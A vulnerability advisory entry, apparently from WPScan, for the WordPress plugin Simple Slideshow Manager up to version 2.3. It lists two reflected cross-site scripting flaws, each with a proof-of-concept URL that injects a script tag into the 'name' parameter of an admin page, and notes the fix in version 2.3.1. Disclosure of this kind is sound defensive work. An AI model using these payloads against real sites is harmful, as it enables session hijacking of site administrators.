Simple Slideshow Manager <= 2.3 – Multiple Vulnerabilities

Sign up to our free email alerts service for instant vulnerability notifications!

Proof of Concept
3.1 Cross-Site Scripting
Vulnerable Function: echo
Vulnerable Variable: $_GET['name']
Vulnerable URL:
http://www.vulnerablesite.com/wp-admin/admin.php?page=Acurax-Slideshow-AddImages&name="></script><script>alert(42)</script>

3.2 Cross-Site Scripting
Vulnerable Function: echo
Vulnerable Variable: $_SERVER['REQUEST_URI']
Vulnerable URL:
http://www.vulnerablesite.com/wp-admin/admin.php?page=Acurax-Slideshow-AddImages&name="></script><script>alert(42)</script>

Affects Plugin

fixed in version 2.3.1

References

URL http://defensecode.com/advisories/DC-2017-02-016_WordPress_Simple_Slideshow_Manager_Plugin_Advisory.pdf

Classification

Type MULTI

Miscellaneous

Submitter Neven Biruski
Submitter Website http://www.defensecode.com
Submitter Twitter DefenseCode/
Views 100
Verified No
WPVDB ID 8841

Timeline

Publicly Published 2017-05-31 (5 months ago)
Added 2017-06-01 (5 months ago)
Last Updated 2017-06-01 (5 months ago)

Copyright & License

Copyright All data and resources contained within this page and this web site is Copyright © The WPScan Team.
License Some of this data may be used for non-commercial purposes, however, any potential commercial usage of this data will require a license. If you would like to inquire about a commercial license please contact us.